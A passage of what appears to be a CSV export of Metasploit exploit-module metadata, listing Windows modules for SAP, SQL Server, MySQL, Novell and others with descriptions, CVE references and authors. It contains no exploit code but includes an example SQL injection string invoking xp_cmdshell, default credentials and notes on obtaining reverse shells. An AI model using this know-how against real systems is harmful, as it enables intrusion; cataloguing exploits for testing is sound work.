License (BSD)","f","2008-12-16 00:00:00",0,,"passive","t","BID-32860, CVE-2008-5664, OSVDB-50715","MC " 985,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/sap_2005_license.rb","exploit","windows/misc/sap_2005_license","exploit/windows/misc/sap_2005_license","SAP Business One License Manager 2005 Buffer Overflow",500,"This module exploits a stack buffer overflow in the SAP Business One 2005 License Manager 'NT Naming Service' A and B releases. By sending an excessively long string the stack is overwritten enabling arbitrary code execution.","Metasploit Framework License (BSD)","t","2009-08-01 00:00:00",0,,"aggressive","t","BID-35933, CVE-2009-4988, EDB-9319, OSVDB-56837","Jacopo Cervini" 986,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb","exploit","windows/misc/sap_netweaver_dispatcher","exploit/windows/misc/sap_netweaver_dispatcher","SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow",300,"This module exploits a stack buffer overflow in the SAP NetWeaver Dispatcher service. The overflow occurs in the DiagTraceR3Info() function and allows a remote attacker to execute arbitrary code by supplying a special crafted Diag packet. The Dispatcher service is only vulnerable if the Developer Traces have been configured at levels 2 or 3. The module has been successfully tested on SAP Netweaver 7.0 EHP2 SP6 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","f","2012-05-08 00:00:00",1,,"aggressive","t","BID-53424, CVE-2012-2611, EDB-20705, OSVDB-81759, URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Uncovering_SAP_vulnerabilities_reversing_and_breaking_the_Diag_protocol, URL-http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities","Martin Gallo, juan vazquez " 987,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/shixxnote_font.rb","exploit","windows/misc/shixxnote_font","exploit/windows/misc/shixxnote_font","ShixxNOTE 6.net Font Field Overflow",500,"This module exploits a buffer overflow in ShixxNOTE 6.net. The vulnerability is caused due to boundary errors in the handling of font fields.","Metasploit Framework License (BSD)","f","2004-10-04 00:00:00",0,,"aggressive","t","BID-11409, CVE-2004-1595, OSVDB-10721","MC " 988,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/splayer_content_type.rb","exploit","windows/misc/splayer_content_type","exploit/windows/misc/splayer_content_type","SPlayer 3.7 Content-Type Buffer Overflow",300,"This module exploits a vulnerability in SPlayer v3.7 or piror. When SPlayer requests the URL of a media file (video or audio), it is possible to gain arbitrary remote code execution due to a buffer overflow caused by an exceeding length of data as the 'Content-Type' parameter.","Metasploit Framework License (BSD)","f","2011-05-04 00:00:00",0,,"passive","t","EDB-17243, OSVDB-72181","sinn3r , xsploitedsec " 989,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/stream_down_bof.rb","exploit","windows/misc/stream_down_bof","exploit/windows/misc/stream_down_bof","CoCSoft StreamDown 6.8.0 Buffer Overflow",400,"Stream Down 6.8.0 seh based buffer overflow triggered when processing the server reponse packet.During the overflow a structured exception handler is overwritten.","Metasploit Framework License (BSD)","f","2011-12-27 00:00:00",0,,"passive","t","BID-51190, CVE-2011-5052, EDB-18283, OSVDB-78043, URL-http://secunia.com/advisories/47343/, URL-http://www.dark-masters.tk/","Fady Mohamed Osman " 990,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/talkative_response.rb","exploit","windows/misc/talkative_response","exploit/windows/misc/talkative_response","Talkative IRC v0.4.4.16 Response Buffer Overflow",300,"This module exploits a stack buffer overflow in Talkative IRC v0.4.4.16. When a specially crafted response string is sent to a client, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-03-17 00:00:00",0,,"passive","t","BID-34141, EDB-8227, OSVDB-64582","MC " 991,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/tiny_identd_overflow.rb","exploit","windows/misc/tiny_identd_overflow","exploit/windows/misc/tiny_identd_overflow","TinyIdentD 2.2 Stack Buffer Overflow",200,"This module exploits a stack based buffer overflow in TinyIdentD version 2.2. If we send a long string to the ident service we can overwrite the return address and execute arbitrary code. Credit to Maarten Boone.","Metasploit Framework License (BSD)","f","2007-05-14 00:00:00",,,"aggressive","t","BID-23981, CVE-2007-2711, OSVDB-36053","Jacopo Cervini " 992,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb","exploit","windows/misc/trendmicro_cmdprocessor_addtask","exploit/windows/misc/trendmicro_cmdprocessor_addtask","TrendMicro Control Manger <= v5.5 CmdProcessor.exe Stack Buffer Overflow",400,"This module exploits a vulnerability in the CmdProcessor.exe component of Trend Micro Control Manger up to version 5.5. The specific flaw exists within CmdProcessor.exe service running on TCP port 20101. The vulnerable function is the CGenericScheduler::AddTask function of cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet, controlled data is copied into a 256-byte stack buffer. This can be exploited to execute remote code under the context of the user.","Metasploit Framework License (BSD)","f","2011-12-07 00:00:00",0,,"aggressive","t","CVE-2011-5001, OSVDB-77585, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-345/","Blue, Luigi Auriemma" 993,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ufo_ai.rb","exploit","windows/misc/ufo_ai","exploit/windows/misc/ufo_ai","UFO: Alien Invasion IRC Client Buffer Overflow",200,"This module exploits a buffer overflow in the IRC client component of UFO: Alien Invasion 2.2.1.","Metasploit Framework License (BSD)","f","2009-10-28 00:00:00",0,,"passive","t","EDB-14013, OSVDB-65689","Jason Geffner, dookie" 994,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/windows_rsh.rb","exploit","windows/misc/windows_rsh","exploit/windows/misc/windows_rsh","Windows RSH daemon Buffer Overflow",200,"This module exploits a vulnerabliltiy in Windows RSH daemon 1.8. The vulnerability is due to a failure to check for the length of input sent to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit to be successful.","Metasploit Framework License (BSD)","t","2007-07-24 00:00:00",0,,"aggressive","t","BID-25044, CVE-2007-4006, OSVDB-38572","MC " 995,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/wireshark_lua.rb","exploit","windows/misc/wireshark_lua","exploit/windows/misc/wireshark_lua","Wireshark console.lua Pre-Loading Script Execution",600,"This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a pcap file, Wireshark will actually check if there's a 'console.lua' file in the same directory, and then parse/execute the script if found. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8","Metasploit Framework License (BSD)","f","2011-07-18 00:00:00",0,,"passive","t","CVE-2011-3360, OSVDB-75347, URL-http://technet.microsoft.com/en-us/security/msvr/msvr11-014, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6136","Haifei Li, sinn3r " 996,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/wireshark_packet_dect.rb","exploit","windows/misc/wireshark_packet_dect","exploit/windows/misc/wireshark_packet_dect","Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (remote)",400,"This module exploits a stack buffer overflow in Wireshark <= 1.4.4 by sending an malicious packet.)","Metasploit Framework License (BSD)","f","2011-04-18 00:00:00",0,,"aggressive","t","CVE-2011-1591, EDB-17185, OSVDB-71848, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838","Paul Makowski, corelanc0d3r , sickness" 997,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb","exploit","windows/mmsp/ms10_025_wmss_connect_funnel","exploit/windows/mmsp/ms10_025_wmss_connect_funnel","Windows Media Services ConnectFunnel Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in the Windows Media Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially crafted FunnelConnect request, an attacker can execute arbitrary code under the ""NetShowServices"" user account. Windows Media Services 4.1 ships with Windows 2000 Server, but is not installed by default. NOTE: This service does NOT restart automatically. Successful, as well as unsuccessful exploitation attempts will kill the service which prevents additional attempts.","Metasploit Framework License (BSD)","f","2010-04-13 00:00:00",0,,"aggressive","t","CVE-2010-0478, MSB-MS10-025, OSVDB-63726, URL-https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt","jduck " 998,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/motorola/timbuktu_fileupload.rb","exploit","windows/motorola/timbuktu_fileupload","exploit/windows/motorola/timbuktu_fileupload","Timbuktu Pro Directory Traversal/File Upload",600,"This module exploits a directory traversal vulnerablity in Motorola's Timbuktu Pro for Windows 8.6.5.","Metasploit Framework License (BSD)","t","2008-05-10 00:00:00",0,,"aggressive","t","CVE-2008-1117, OSVDB-43544","MC " 999,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb","exploit","windows/mssql/lyris_listmanager_weak_pass","exploit/windows/mssql/lyris_listmanager_weak_pass","Lyris ListManager MSDE Weak sa Password",600,"This module exploits a weak password vulnerability in the Lyris ListManager MSDE install. During installation, the 'sa' account password is set to 'lminstall'. Once the install completes, it is set to 'lyris' followed by the process ID of the installer. This module brute forces all possible process IDs that would be used by the installer.","Metasploit Framework License (BSD)","f","2005-12-08 00:00:00",0,,"aggressive","t","CVE-2005-4145, OSVDB-21559","hdm " 1000,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/ms02_039_slammer.rb","exploit","windows/mssql/ms02_039_slammer","exploit/windows/mssql/ms02_039_slammer","Microsoft SQL Server Resolution Overflow",400,"This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).","Metasploit Framework License (BSD)","t","2002-07-24 00:00:00",0,,"aggressive","t","BID-5310, CVE-2002-0649, MSB-MS02-039, OSVDB-4578","hdm " 1001,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/ms02_056_hello.rb","exploit","windows/mssql/ms02_056_hello","exploit/windows/mssql/ms02_056_hello","Microsoft SQL Server Hello Overflow",400,"By sending malformed data to TCP port 1433, an unauthenticated remote attacker could overflow a buffer and possibly execute code on the server with SYSTEM level privileges. This module should work against any vulnerable SQL Server 2000 or MSDE install (< SP3).","Metasploit Framework License (BSD)","t","2002-08-05 00:00:00",0,,"aggressive","t","BID-5411, CVE-2002-1123, MSB-MS02-056, OSVDB-10132","MC " 1002,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb","exploit","windows/mssql/ms09_004_sp_replwritetovarbin","exploit/windows/mssql/ms09_004_sp_replwritetovarbin","Microsoft SQL Server sp_replwritetovarbin Memory Corruption",400,"A heap-based buffer overflow can occur when calling the undocumented ""sp_replwritetovarbin"" extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005 without any public mention. An authenticated database session is required to access the vulnerable code. That said, it is possible to access the vulnerable code via an SQL injection vulnerability. This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0 2. pointer to a 32-bit value that is set to a length influcenced by the buffer length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the displacement is 0x10. The address of our buffer is conveniently stored in ecx when this instruction is executed. 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, return oriented programming is used to normalize the execution state and finally execute the payload via a ""jmp esp"". All addresses used were found within the sqlservr.exe memory space, yielding very reliable code execution using only a single query. NOTE: The MSSQL server service does not automatically restart by default. That said, some exceptions are caught and will not result in terminating the process. If the exploit crashes the service prior to hijacking the stack, it won't die. Otherwise, it's a goner.","Metasploit Framework License (BSD)","t","2008-12-09 00:00:00",0,,"aggressive","t","BID-32710, CVE-2008-5416, EDB-7501, MSB-MS09-004, OSVDB-50589","jduck " 1003,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb","exploit","windows/mssql/ms09_004_sp_replwritetovarbin_sqli","exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli","Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",600,"A heap-based buffer overflow can occur when calling the undocumented ""sp_replwritetovarbin"" extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005 without any public mention. This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0 2. pointer to a 32-bit value that is set to a length influcenced by the buffer length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the displacement is 0x10. The address of our buffer is conveniently stored in ecx when this instruction is executed. 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, return oriented programming is used to normalize the execution state and finally execute the payload via a ""jmp esp"". All addresses used were found within the sqlservr.exe memory space, yielding very reliable code execution using only a single query. NOTE: The MSSQL server service does not automatically restart by default. That said, some exceptions are caught and will not result in terminating the process. If the exploit crashes the service prior to hijacking the stack, it won't die. Otherwise, it's a goner.","Metasploit Framework License (BSD)","t","2008-12-09 00:00:00",0,,"aggressive","t","BID-32710, CVE-2008-5416, EDB-7501, MSB-MS09-004, OSVDB-50589, URL-http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/","Rodrigo Marcos, jduck " 1004,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/mssql_linkcrawler.rb","exploit","windows/mssql/mssql_linkcrawler","exploit/windows/mssql/mssql_linkcrawler","Microsoft SQL Server Database Link Crawling Command Execution",500,"This module can be used to crawl MS SQL Server database links and deploy Metasploit payloads through links configured with sysadmin privileges using a valid SQL Server Login. If you are attempting to obtain multiple reverse shells using this module we recommend setting the ""DisablePayloadHandler"" advanced option to ""true"", and setting up a multi/handler to run in the background as a job to support multiple incoming shells. If you are interested in deploying payloads to spefic servers this module also supports that functionality via the ""DEPLOYLIST"" option. Currently, the module is capable of delivering payloads to both 32bit and 64bit Windows systems via powershell memory injection methods based on Matthew Graeber's work. As a result, the target server must have powershell installed. By default, all of the crawl information is saved to a CSV formatted log file and MSF loot so that the tool can also be used for auditing without deploying payloads.","Metasploit Framework License (BSD)","f","2000-01-01 00:00:00",0,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/ms188279.aspx, URL-http://www.exploit-monday.com/2011_10_16_archive.html, URL-http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012","Antti Rantasaari , Scott Sutherland ""nullbind"" " 1005,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/mssql_payload.rb","exploit","windows/mssql/mssql_payload","exploit/windows/mssql/mssql_payload","Microsoft SQL Server Payload Execution",600,"This module executes an arbitrary payload on a Microsoft SQL Server by using the ""xp_cmdshell"" stored procedure. Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are avoidied by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses 'wcsript.exe' to generate the executable on the target. Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the payload on the target. NOTE: This module will leave a payload executable on the target system when the attack is finished.","Metasploit Framework License (BSD)","f","2000-05-30 00:00:00",0,,"aggressive","t","BID-1281, BID-4797, CVE-2000-0402, CVE-2000-1209, OSVDB-15757, OSVDB-557","David Kennedy ""ReL1K"" , jduck " 1006,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/mssql_payload_sqli.rb","exploit","windows/mssql/mssql_payload_sqli","exploit/windows/mssql/mssql_payload_sqli","Microsoft SQL Server Payload Execution via SQL Injection",600,"This module will execute an arbitrary payload on a Microsoft SQL Server, using a SQL injection vulnerability. Once a vulnerability is identified this module will use xp_cmdshell to upload and execute Metasploit payloads. It is necessary to specify the exact point where the SQL injection vulnerability happens. For example, given the following injection: http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical you would need to set the following path: set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar In regard to the payload, unless there is a closed port in the web server, you dont want to use any ""bind"" payload, specially on port 80, as you will stop reaching the vulnerable web server host. You want a ""reverse"" payload, probably to your port 80 or to any other outbound port allowed on the firewall. For privileged ports execute Metasploit msfconsole as root. Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are avoidied by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses 'wcsript.exe' to generate the executable on the target. Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the payload on the target. NOTE: This module will leave a payload executable on the target system when the attack is finished.","Metasploit Framework License (BSD)","f","2000-05-30 00:00:00",0,,"aggressive","t","BID-1281, BID-4797, CVE-2000-0402, CVE-2000-1209, OSVDB-15757, OSVDB-557, URL-http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/","David Kennedy ""ReL1K"" , Rodrigo Marcos, jduck " 1007,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mysql/mysql_mof.rb","exploit","windows/mysql/mysql_mof","exploit/windows/mysql/mysql_mof","Oracle MySQL for Microsoft Windows MOF Execution",600,"This module takes advantage of a file privilege misconfiguration problem specifically against Windows MySQL servers (due to the use of a .mof file). This may result in arbitrary code execution under the context of SYSTEM. However, please note in order to use this module, you must have a valid MySQL account on the target machine.","Metasploit Framework License (BSD)","f","2012-12-01 00:00:00",0,,"aggressive","t","CVE-2012-5613, EDB-23083, OSVDB-88118, URL-http://seclists.org/fulldisclosure/2012/Dec/13","kingcope, sinn3r " 1008,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mysql/mysql_payload.rb","exploit","windows/mysql/mysql_payload","exploit/windows/mysql/mysql_payload","Oracle MySQL for Microsoft Windows Payload Execution",600,"This module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.","Metasploit Framework License (BSD)","f","2009-01-16 00:00:00",0,,"aggressive","t","URL-http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html, URL-http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html","Bernardo Damele A. G. , todb " 1009,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mysql/mysql_yassl_hello.rb","exploit","windows/mysql/mysql_yassl_hello","exploit/windows/mysql/mysql_yassl_hello","MySQL yaSSL SSL Hello Message Buffer Overflow",200,"This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier) implementation bundled with MySQL <= 6.0. By sending a specially crafted Hello packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-01-04 00:00:00",0,,"aggressive","t","BID-27140, CVE-2008-0226, OSVDB-41195","MC " 1010,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb","exploit","windows/mysql/scrutinizer_upload_exec","exploit/windows/mysql/scrutinizer_upload_exec","Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",600,"This exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer. By default, the software installs a default password in MySQL, and binds the service to ""0.0.0.0"". This allows any remote user to login to MySQL, and then gain arbitrary remote code execution under the context of 'SYSTEM'. Examples of default credentials include: 'scrutinizer:admin', and 'scrutremote:admin'.","Metasploit Framework License (BSD)","f","2012-07-27 00:00:00",0,,"aggressive","t","CVE-2012-3951, OSVDB-84317, URL-http://secunia.com/advisories/50074/, URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt","Jonathan Claudius, MC , Tanya Secker, sinn3r " 1011,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/nfs/xlink_nfsd.rb","exploit","windows/nfs/xlink_nfsd","exploit/windows/nfs/xlink_nfsd","Omni-NFS Server Buffer Overflow",200,"This module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2 When sending a specially crafted nfs packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2006-11-06 00:00:00",0,,"aggressive","t","BID-20941, CVE-2006-5780, OSVDB-30224, URL-http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm","MC " 1012,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/nntp/ms05_030_nntp.rb","exploit","windows/nntp/ms05_030_nntp","exploit/windows/nntp/ms05_030_nntp","Microsoft Outlook Express NNTP Response Parsing Buffer Overflow",300,"This module exploits a stack buffer overflow in the news reader of Microsoft Outlook Express.","Metasploit Framework License (BSD)","f","2005-06-14 00:00:00",0,,"passive","t","BID-13951, CVE-2005-1213, MSB-MS05-030, OSVDB-17306","MC " 1013,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb","exploit","windows/novell/file_reporter_fsfui_upload","exploit/windows/novell/file_reporter_fsfui_upload","NFR Agent FSFUI Record File Upload RCE",500,"NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload arbitrary files via a directory traversal while handling requests to /FSF/CMD with FSFUI records with UICMD 130. This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).","Metasploit Framework License (BSD)","f","2012-11-16 00:00:00",0,,"aggressive","t","CVE-2012-4959, URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959","juan vazquez " 1014,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/groupwisemessenger_client.rb","exploit","windows/novell/groupwisemessenger_client","exploit/windows/novell/groupwisemessenger_client","Novell GroupWise Messenger Client Buffer Overflow",300,"This module exploits a stack buffer overflow in Novell's GroupWise Messenger Client. By sending a specially crafted HTTP response, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-07-02 00:00:00",0,,"passive","t","BID-29602, CVE-2008-2703, OSVDB-46041, URL-http://www.infobyte.com.ar/adv/ISR-17.html","MC " 1015,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/netiq_pum_eval.rb","exploit","windows/novell/netiq_pum_eval","exploit/windows/novell/netiq_pum_eval","NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution",600,"This module abuses a lack of authorization in the NetIQ Privileged User Manager service (unifid.exe) to execute arbitrary perl code. The problem exists in the ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.","Metasploit Framework License (BSD)","t","2012-11-15 00:00:00",0,,"passive","t","BID-56539, EDB-22738, OSVDB-87334, URL-http://retrogod.altervista.org/9sg_novell_netiq_ldapagnt_adv.htm","juan vazquez , rgod" 1016,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/nmap_stor.rb","exploit","windows/novell/nmap_stor","exploit/windows/novell/nmap_stor","Novell NetMail <= 3.52d NMAP STOR Buffer Overflow",200,"This module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.","Metasploit Framework License (BSD)","t","2006-12-23 00:00:00",0,,"aggressive","t","BID-21725, CVE-2006-6424, OSVDB-31363","MC " 1017,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/zenworks_desktop_agent.rb","exploit","windows/novell/zenworks_desktop_agent","exploit/windows/novell/zenworks_desktop_agent","Novell ZENworks 6.5 Desktop/Server Management Overflow",400,"This module exploits a heap overflow in the Novell ZENworks Desktop Management agent. This vulnerability was discovered by Alex Wheeler.","BSD License","t","2005-05-19 00:00:00",0,,"aggressive","t","BID-13678, CVE-2005-1543, OSVDB-16698","Unknown" 1018,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb","exploit","windows/novell/zenworks_preboot_op21_bof","exploit/windows/novell/zenworks_preboot_op21_bof","Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow",300,"This module exploits a remote buffer overflow in the ZENworks Configuration Management 10 SP2. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted packet with the opcode 0x21 (PROXY_CMD_FTP_FILE) to port 998/TCP. The module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","f","2010-03-30 00:00:00",0,,"aggressive","t","BID-40486, OSVDB-65361, URL-http://www.novell.com/support/kb/doc.php?id=7005572, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-090/","Stephen Fewer, juan vazquez " 1019,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb","exploit","windows/novell/zenworks_preboot_op4c_bof","exploit/windows/novell/zenworks_preboot_op4c_bof","Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow",300,"This module exploits a remote buffer overflow in the ZENworks Configuration Management. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted packet with the opcode 0x4c (PROXY_CMD_PREBOOT_TASK_INFO2) to port 998/TCP. The module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 / SP3 and Windows Server 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","f","2012-02-22 00:00:00",0,,"aggressive","t","BID-52659, CVE-2011-3176, OSVDB-80231, URL-http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5127930.html, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=974","Luigi Auriemma, juan vazquez " 1020,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb","exploit","windows/novell/zenworks_preboot_op6_bof","exploit/windows/novell/zenworks_preboot_op6_bof","Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow",300,"This module exploits a remote buffer overflow in the ZENworks Configuration Management 10 SP2. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted packet with the opcode 0x06 (PROXY_CMD_CLEAR_WS) to the 998/TCP port. The module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","f","2010-03-30 00:00:00",0,,"aggressive","t","BID-40486, OSVDB-65361, URL-http://www.novell.com/support/kb/doc.php?id=7005572, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-090/","Stephen Fewer, juan vazquez " 1021,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb","exploit","windows/novell/zenworks_preboot_op6c_bof","exploit/windows/novell/zenworks_preboot_op6c_bof","Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow",300,"This module exploits a remote buffer overflow in the ZENworks Configuration Management. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted packet with the opcode 0x6c (PROXY_CMD_GET_NEXT_STEP) to port 998/TCP. The module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 / SP3 and Windows Server 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","f","2012-02-22 00:00:00",0,,"aggressive","t","BID-52659, CVE-2011-3175, OSVDB-80231, URL-http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5127930.html, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=973","Luigi Auriemma, juan vazquez " 1022,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/oracle/client_system_analyzer_upload.rb","exploit","windows/oracle/client_system_analyzer_upload","exploit/windows/oracle/client_system_analyzer_upload","Oracle Database Client System Analyzer Arbitrary File Upload",600,"This module exploits an arbitrary file upload vulnerability on the Client Analyzer component as included in Oracle Database 11g, which allows remote 